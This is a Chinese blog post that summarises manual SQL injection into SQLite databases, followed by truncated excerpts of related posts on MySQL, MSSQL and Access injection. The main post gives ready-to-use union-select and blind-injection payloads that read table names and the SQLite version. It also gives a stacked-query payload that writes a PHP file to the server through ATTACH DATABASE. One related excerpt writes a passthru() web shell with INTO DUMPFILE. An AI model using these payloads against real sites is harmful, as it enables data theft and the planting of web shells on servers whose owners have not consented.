SQLite手工注入方法小结

SQLite 官网下载:www.sqlite.org/download.html

sqlite管理工具:http://www.yunqa.de/delphi/products/sqlitespy/index

sqlite_master隐藏表,具体内容如下:

字段:type/name/tbl_name/rootpage/sql

sqlite注入测试:

1、Union select 查询

select * from test where id =1 and 1=2 union select name,sql from sqlite_master

2、盲注

select * from test where id =1 union select 1,length(sqlite_version())=6    //得到sqlite版本位数

select * from test where id =1 and substr(sqlite_version(),1,1)=‘3‘            //得到sqlite版本首位为3

select * from test where id =1 and substr((select name from sqlite_master where type=‘table‘ limit 0,1),1,1)=‘T‘  (大小写区分,有差别)  //得到sqlite表名第一位为T

3、Getshell

select * from test where id =1 ;ATTACH DATABASE ‘C:\\Sqlite\\xiaozi.php‘ AS pwn ; CREATE TABLE pwn.exp (dataz text) ; INSERT INTO pwn.exp (dataz) VALUES (‘ <?php phpinfo(); ?> ‘); --

参考链接:

Win7下SQLite安装配置与使用方法详解:http://www.codeceo.com/article/win7-sqlite-usage.html

Windows下安装配置SQLite和使用的教程:http://www.weste.net/2014/10-08/99347.html

时间: 2024-10-13 08:29:30

SQLite手工注入方法小结的相关文章

MySQL手工注入方法

MySQL手工注入方法 原文地址:https://www.cnblogs.com/blogs-1024/p/11141285.html

手工注入方法,方便大家测试注入点(含视频教程)

1.加入单引号 '提交, 结果:如果出现错误提示,则该网站可能就存在注入漏洞. 2.数字型判断是否有注入; 语句:and 1=1 ;and 1=2 (经典).' and '1'=1(字符型) 结果:分别返回不同的页面,说明存在注入漏洞. 分析:and 的意思是"和"如果没有过滤我们的语句,and 1=1就会被代入SQL查询语句进行查询, 如果and前后的两条语句都是真的话就不会出错,但如果前后语句有一个为假的话,程序就会暴错. 也就表明程序有注入漏洞 防注入解决办法: 1>使用o

基础篇——SQL注入(手工注入)

SQL注入 当我们学习一个知识时我们要考虑几个问题:是什么?怎么做?然后进行有条理的学习 是什么? 首先我们要明白SQL注入是什么: sql——结构化查询语言 SQL注入就是在网站url中插入sql语句,执行sql命令,获取数据库内容,达到欺骗服务器的目的. SQL注入的原理:普通用户提交sql查询语句,网站没有对用户输入进行过滤导致执行用户命令 危害及防护 危害:SQL注入可以使入侵者获取后台账号密码.拖库.进入后台破坏.拿shell 防护:设置网站黑名单.限制敏感词汇.对用户输入进行转义.将

mssql2005存手工注入漏洞附攻击方法- 寒龙网出品

/**/跟空格的作用一样,有的时候可以过一些过滤爆库语句,修改红色部分的数字挨个猜出库 /**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[

mysql手工注入

information_schema SQL基础 1.1 什么是sql? SQL(structured query language),即结构化查询语言,是关系数据库的标准语言,SQL是一个通用的.功能强大的关系数据库语言,但其功能并不仅仅是查询. 1.2 mysql MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品.另外,MySQL是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速

sql工具和手工注入总结

普通注入: 数字注入 字符注入 base64注入:和常规的方法没有说明区别,主要是解码然后编码: 如果普通注入不行,尝试大小写绕过,编码等绕过: 如果不行尝试盲注: 盲注: 基于报错的注入(随笔有总结) 延时注入:利用数据库延时特性,sleep(10),没有报错就说明存在注入 或者尝试cookie注入: cookie注入: 穿山甲(有cookie选项) sqlmap使用:sqlmap.py -u "http:www.xx.com/show.asp" --cookie "id=

SQL注入原理 手工注入access数据库

SQL注入原理 手工注入access数据库 SQL注入是通过将SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL指令的目的. 1.判断网站是否有注入点. 在以asp?id=xx(任意数字)结尾的连接依次添加: ' 1=1 1=2 若以上结果显示"数据库出错","正常显示","数据库出错"则该网站存在注入点. 2.猜解表名 在链接末尾添加语句: and exists(select * from admi

小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell

SQL手工注入 1.读取文件[load_file函数] ' union  SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+   [写入一句话木马:INTO DUMPLING:MySQL函数,将输入下载在数据库中]

第一次手工注入

第一次手工注入 第一次注入: 看到他们黑站感觉很有意思的样子,于是我也玩了一下午,虽然都是些狠狠狠简单的东西,不过还是记录下来啦. 虽然和我现在做的没啥关系,不过,,,挺好 浏览器的"工具"--"internet选项"--"高级"--"显示友好http错误信息"(里的勾给去掉哦)注明:就是显示页面出错的信息. 2通过在搜索框中输入inurl:asp?id=    (筛选出url中带有asp?id=   字段的所有结果),然后慢